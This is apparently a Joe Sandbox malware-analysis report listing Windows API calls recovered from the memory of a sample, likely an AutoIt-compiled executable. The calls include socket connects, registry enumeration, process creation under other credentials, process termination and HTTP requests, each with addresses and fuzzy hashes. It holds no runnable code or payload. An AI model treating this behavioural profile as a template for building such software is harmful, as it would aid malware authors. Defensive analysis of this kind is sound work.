              • GetWindowLongW.USER32(014260A8,000000F0), ref: 0020658E
              • GetWindowLongW.USER32(014260A8,000000F0), ref: 002065C3
              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002065F5
              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0020661F
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00206630
              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0020664A
              Similarity
              • API ID: LongWindow$MessageSend
              • String ID:
              • API String ID: 2178440468-0
              APIs
                • Part of subcall function 001F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001F64D9
              • WSAGetLastError.WSOCK32(00000000), ref: 001F64E8
              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F6521
              • connect.WSOCK32(00000000,?,00000010), ref: 001F652A
              • WSAGetLastError.WSOCK32 ref: 001F6534
              • closesocket.WSOCK32(00000000), ref: 001F655D
              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F6576
              Similarity
              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
              • String ID:
              • API String ID: 910771015-0
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DE0FA
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DE120
              • SysAllocString.OLEAUT32(00000000), ref: 001DE123
              • SysAllocString.OLEAUT32 ref: 001DE144
              • SysFreeString.OLEAUT32 ref: 001DE14D
              • StringFromGUID2.OLE32(?,?,00000028), ref: 001DE167
              • SysAllocString.OLEAUT32(?), ref: 001DE175
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002078A1
              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002078AE
              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002078B9
              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002078C8
              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002078D4
              Similarity
              • API ID: MessageSend$CreateObjectStockWindow
              • String ID: Msctls_Progress32
              • API String ID: 1025951953-3636473452
              APIs
              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001A4292,?), ref: 001A41E3
              • GetProcAddress.KERNEL32(00000000), ref: 001A41EA
              • EncodePointer.KERNEL32(00000000), ref: 001A41F6
              • DecodePointer.KERNEL32(00000001,001A4292,?), ref: 001A4213
              Similarity
              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
              • String ID: RoInitialize$combase.dll
              • API String ID: 3489934621-340411864
              APIs
              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001A41B8), ref: 001A42B8
              • GetProcAddress.KERNEL32(00000000), ref: 001A42BF
              • EncodePointer.KERNEL32(00000000), ref: 001A42CA
              • DecodePointer.KERNEL32(001A41B8), ref: 001A42E5
              Similarity
              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
              • String ID: RoUninitialize$combase.dll
              • API String ID: 3489934621-2819208100
              APIs
              Similarity
              • API ID: _memmove$__itow__swprintf
              • String ID:
              • API String ID: 3253778849-0
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200548
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00200588
              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002005AB
              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002005D4
              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00200617
              • RegCloseKey.ADVAPI32(00000000), ref: 00200624
              Similarity
              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
              • String ID:
              • API String ID: 4046560759-0
              APIs
              • GetMenu.USER32(?), ref: 00205A82
              • GetMenuItemCount.USER32(00000000), ref: 00205AB9
              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00205AE1
              • GetMenuItemID.USER32(?,?), ref: 00205B50
              • GetSubMenu.USER32(?,?), ref: 00205B5E
              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00205BAF
              Similarity
              • API ID: Menu$Item$CountMessagePostString
              • String ID:
              • API String ID: 650687236-0
              APIs
              • VariantInit.OLEAUT32(?), ref: 001DF3F7
              • VariantClear.OLEAUT32(00000013), ref: 001DF469
              • VariantClear.OLEAUT32(00000000), ref: 001DF4C4
              • _memmove.LIBCMT ref: 001DF4EE
              • VariantClear.OLEAUT32(?), ref: 001DF53B
              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001DF569
              Similarity
              • API ID: Variant$Clear$ChangeInitType_memmove
              • String ID:
              • API String ID: 1101466143-0
              APIs
              • _memset.LIBCMT ref: 001E2747
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2792
              • IsMenu.USER32(00000000), ref: 001E27B2
              • CreatePopupMenu.USER32 ref: 001E27E6
              • GetMenuItemCount.USER32(000000FF), ref: 001E2844
              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001E2875
              Similarity
              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
              • String ID:
              • API String ID: 3311875123-0
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0018179A
              • GetWindowRect.USER32(?,?), ref: 001817FE
              • ScreenToClient.USER32(?,?), ref: 0018181B
              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0018182C
              • EndPaint.USER32(?,?), ref: 00181876
              Similarity
              • API ID: PaintWindow$BeginClientLongRectScreenViewport
              • String ID:
              • API String ID: 1827037458-0
              APIs
              • ShowWindow.USER32(002467B0,00000000,014260A8,?,?,002467B0,?,0020B862,?,?), ref: 0020B9CC
              • EnableWindow.USER32(00000000,00000000), ref: 0020B9F0
              • ShowWindow.USER32(002467B0,00000000,014260A8,?,?,002467B0,?,0020B862,?,?), ref: 0020BA50
              • ShowWindow.USER32(00000000,00000004,?,0020B862,?,?), ref: 0020BA62
              • EnableWindow.USER32(00000000,00000001), ref: 0020BA86
              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0020BAA9
              Similarity
              • API ID: Window$Show$Enable$MessageSend
              • String ID:
              • API String ID: 642888154-0
              APIs
              • GetForegroundWindow.USER32(?,?,?,?,?,?,001F5134,?,?,00000000,00000001), ref: 001F73BF
                • Part of subcall function 001F3C94: GetWindowRect.USER32(?,?), ref: 001F3CA7
              • GetDesktopWindow.USER32 ref: 001F73E9
              • GetWindowRect.USER32(00000000), ref: 001F73F0
              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001F7422
                • Part of subcall function 001E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E555E
              • GetCursorPos.USER32(?), ref: 001F744E
              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001F74AC
              Similarity
              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
              • String ID:
              • API String ID: 4137160315-0
              APIs
                • Part of subcall function 001D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D8608
                • Part of subcall function 001D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D8612
                • Part of subcall function 001D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D8621
                • Part of subcall function 001D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D8628
                • Part of subcall function 001D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D863E
              • GetLengthSid.ADVAPI32(?,00000000,001D8977), ref: 001D8DAC
              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001D8DB8
              • HeapAlloc.KERNEL32(00000000), ref: 001D8DBF
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 001D8DD8
              • GetProcessHeap.KERNEL32(00000000,00000000,001D8977), ref: 001D8DEC
              • HeapFree.KERNEL32(00000000), ref: 001D8DF3
              Similarity
              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
              • String ID:
              • API String ID: 3008561057-0
              APIs
              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001D8B2A
              • OpenProcessToken.ADVAPI32(00000000), ref: 001D8B31
              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001D8B40
              • CloseHandle.KERNEL32(00000004), ref: 001D8B4B
              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001D8B7A
              • DestroyEnvironmentBlock.USERENV(00000000), ref: 001D8B8E
              Similarity
              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
              • String ID:
              • API String ID: 1413079979-0
              APIs
                • Part of subcall function 001812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018135C
                • Part of subcall function 001812F3: BeginPath.GDI32(?), ref: 00181373
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018139C
              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0020C1C4
              • LineTo.GDI32(00000000,00000003,?), ref: 0020C1D8
              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0020C1E6
              • LineTo.GDI32(00000000,00000000,?), ref: 0020C1F6
              • EndPath.GDI32(00000000), ref: 0020C206
              • StrokePath.GDI32(00000000), ref: 0020C216
              Similarity
              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
              • String ID:
              • API String ID: 43455801-0
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A03D3
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001A03DB
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A03E6
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A03F1
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001A03F9
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A0401
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
              • Instruction ID: f151f029ee5215b9018eef831500f7cbe61ba8e3a83edd18bd9c24321523ad57
              • Opcode Fuzzy Hash: df89cc157cbdd1c200528a9c2cb662166effacd5244c94e04a288095790e1bad
              • Instruction Fuzzy Hash: EA016CB09417597DE3008F5A8C85B52FFA8FF19354F00411BA15C47942C7F5A864CFE5
              APIs
              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001E569B
              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001E56B1
              • GetWindowThreadProcessId.USER32(?,?), ref: 001E56C0
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56CF
              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56D9
              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001E56E0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
              • String ID:
              • API String ID: 839392675-0
              • Opcode ID: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
              • Instruction ID: 4241f761a4938388fa2cb08c758eb0f2be73e3be545bea751fee64867d8ce044
              • Opcode Fuzzy Hash: 48a8415b35a77aacd529ca45a7da89f7b3fed3679c984f72a826d0004f363168
              • Instruction Fuzzy Hash: FCF09032281258BBE3305BA2ED0DEEF7B7CEFCAB11F000169FA04D1052DBA11A0186B5
              APIs
              • InterlockedExchange.KERNEL32(?,?), ref: 001E74E5
              • EnterCriticalSection.KERNEL32(?,?,00191044,?,?), ref: 001E74F6
              • TerminateThread.KERNEL32(00000000,000001F6,?,00191044,?,?), ref: 001E7503
              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00191044,?,?), ref: 001E7510
                • Part of subcall function 001E6ED7: CloseHandle.KERNEL32(00000000,?,001E751D,?,00191044,?,?), ref: 001E6EE1
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001E7523
              • LeaveCriticalSection.KERNEL32(?,?,00191044,?,?), ref: 001E752A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
              • Instruction ID: 849179481085fb9ea4d72669e7b37ff05f74edcd35649ba95f4d25aa25c27b7b
              • Opcode Fuzzy Hash: 07239221868e2581b2d0834b527bdc89bb67fb54cf0ee9c8b1ddf8a0a6b07709
              • Instruction Fuzzy Hash: 72F0543A180712EFE7616B64FE4C9DF7729EF45302F000531F502914B6CB755801CB50
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D8E7F
              • UnloadUserProfile.USERENV(?,?), ref: 001D8E8B
              • CloseHandle.KERNEL32(?), ref: 001D8E94
              • CloseHandle.KERNEL32(?), ref: 001D8E9C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 001D8EA5
              • HeapFree.KERNEL32(00000000), ref: 001D8EAC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
              • String ID:
              • API String ID: 146765662-0
              • Opcode ID: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
              • Instruction ID: 2d433bd2b497b59436208efc3ee6050957629c98176ca43449e390c8d4e0c459
              • Opcode Fuzzy Hash: 6fc10c4ab5bbe979cc175007bbfec08c42580857f694b17781b6a768b22fa165
              • Instruction Fuzzy Hash: 54E0C236084201FBDA515FE1FE0C90AFB79FB89722B108230F21981871CB329460DB90
              APIs
              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C32
              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C4A
              • CLSIDFromProgID.OLE32(?,?,00000000,0020FB80,000000FF,?,00000000,00000800,00000000,?,00212C7C,?), ref: 001D7C6F
              • _memcmp.LIBCMT ref: 001D7C90
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FromProg$FreeTask_memcmp
              • String ID: ,,!
              • API String ID: 314563124-3142458726
              • Opcode ID: 25cca3e58526fd7cc3a4a2ee04a99778e706abaad8ab4e3452cd7a72b828cc0b
              • Instruction ID: 4965d374a956318e8997f17eab713dabf9e91fd484aa0ea93174570eb4026ecd
              • Opcode Fuzzy Hash: 25cca3e58526fd7cc3a4a2ee04a99778e706abaad8ab4e3452cd7a72b828cc0b
              • Instruction Fuzzy Hash: 6F812C75A00109EFCB04DF94C984DEEB7B9FF89315F204599F506AB290EB71AE06CB60
              APIs
              • VariantInit.OLEAUT32(?), ref: 001F8928
              • CharUpperBuffW.USER32(?,?), ref: 001F8A37
              • VariantClear.OLEAUT32(?), ref: 001F8BAF
                • Part of subcall function 001E7804: VariantInit.OLEAUT32(00000000), ref: 001E7844
                • Part of subcall function 001E7804: VariantCopy.OLEAUT32(00000000,?), ref: 001E784D
                • Part of subcall function 001E7804: VariantClear.OLEAUT32(00000000), ref: 001E7859
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$ClearInit$BuffCharCopyUpper
              • String ID: AUTOIT.ERROR$Incorrect Parameter format
              • API String ID: 4237274167-1221869570
              • Opcode ID: a4a300036e5842e1e482cc0f21843efe40b81ecfb297ce3fa427804637cd4832
              • Instruction ID: 92d9764e8b2b8246b1afcf21a820d0a0f8f641c69adaf24b91985a2a65169166
              • Opcode Fuzzy Hash: a4a300036e5842e1e482cc0f21843efe40b81ecfb297ce3fa427804637cd4832
              • Instruction Fuzzy Hash: 39919B756083059FC714EF24C48496ABBF4FF99314F04896EF99A8B362DB30E906CB52
              APIs
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
              • _memset.LIBCMT ref: 001E3077
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E30A6
              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E3159
              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001E3187
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$Default_memset_wcscpy
              • String ID: 0
              • API String ID: 4152858687-4108050209
              • Opcode ID: 7643e62cf9ea92ba111c5934c0e95d5520116aab2e1a949f3fe0121f1708a92a
              • Instruction ID: 89b7ee1b1fa9071927f62b55425226055d88c4df358e2690d9a72b40985ce0b2
              • Opcode Fuzzy Hash: 7643e62cf9ea92ba111c5934c0e95d5520116aab2e1a949f3fe0121f1708a92a
              • Instruction Fuzzy Hash: 035104316087809FD7299F29D84DA6FBBE8EF55760F04092DF8A5D3191DB70CE448B52
              APIs
              • _memset.LIBCMT ref: 001E2CAF
              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001E2CCB
              • DeleteMenu.USER32(?,00000007,00000000), ref: 001E2D11
              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00246890,00000000), ref: 001E2D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$Delete$InfoItem_memset
              • String ID: 0
              • API String ID: 1173514356-4108050209
              • Opcode ID: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
              • Instruction ID: ee4b6e8ca1f823744be5e4fd3ba02c0e42b736b8b9380e33d6c6f2217857c026
              • Opcode Fuzzy Hash: e9fc50e657f473ce7f677776f620a9b2c2a9ef256b67b4a685b1b763f556f6b1
              • Instruction Fuzzy Hash: 6541AC302047829FD724DF65DC54B5EBBE8BF85320F14462DFA65972A1D770E904CB92
              APIs
              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FDAD9
                • Part of subcall function 001879AB: _memmove.LIBCMT ref: 001879F9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharLower_memmove
              • String ID: cdecl$none$stdcall$winapi
              • API String ID: 3425801089-567219261
              • Opcode ID: 537baabac9bc3fe78c401b5a96ce5053eb73f9c83a395b7605b85c4a4dcdbf94
              • Instruction ID: b685207e91926257a635d92e07caa632e26966b72c49fe16fb0297ccd69c318b
              • Opcode Fuzzy Hash: 537baabac9bc3fe78c401b5a96ce5053eb73f9c83a395b7605b85c4a4dcdbf94
              • Instruction Fuzzy Hash: E831D275500619AFCF04EF94CC818BEB3B5FF16320B108629E925976D1CB31EA06CB80
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001D93F6
              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001D9409
              • SendMessageW.USER32(?,00000189,?,00000000), ref: 001D9439
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$_memmove$ClassName
              • String ID: ComboBox$ListBox
              • API String ID: 365058703-1403004172
              • Opcode ID: 3558fef939ab62800a2ff70f4938e5a90d2475bd6089a71bb7e520a30a03e9ff
              • Instruction ID: e24f7d5e0d791d2a56b31ccc282ee7bb5e96c514b62d2a73671435aa11f0076d
              • Opcode Fuzzy Hash: 3558fef939ab62800a2ff70f4938e5a90d2475bd6089a71bb7e520a30a03e9ff
              • Instruction Fuzzy Hash: B8212671940204BFDB18ABB0DC85CFFB77CEF16360B10421AF921972E2DB355A4A8A60
              APIs
              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F1B40
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001F1B66
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001F1B96
              • InternetCloseHandle.WININET(00000000), ref: 001F1BDD
                • Part of subcall function 001F2777: GetLastError.KERNEL32(?,?,001F1B0B,00000000,00000000,00000001), ref: 001F278C
                • Part of subcall function 001F2777: SetEvent.KERNEL32(?,?,001F1B0B,00000000,00000000,00000001), ref: 001F27A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
              • String ID:
              • API String ID: 3113390036-3916222277
              • Opcode ID: 7f81b9e0416e5fce2046587aa7df41116954b34b14ee5dd2d92ae219fc785842
              • Instruction ID: 88ce93d34ea9bc973fb6f61eca0f8c9a61f126ac6ba016b438f2fb9122c2a250
              • Opcode Fuzzy Hash: 7f81b9e0416e5fce2046587aa7df41116954b34b14ee5dd2d92ae219fc785842
              • Instruction Fuzzy Hash: 3221BEB154020CFFEB219F609C89EBB77FCEB99744F10412AF605A2650EB309D059762
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002066D0
              • LoadLibraryW.KERNEL32(?), ref: 002066D7
              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002066EC
              • DestroyWindow.USER32(?), ref: 002066F4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
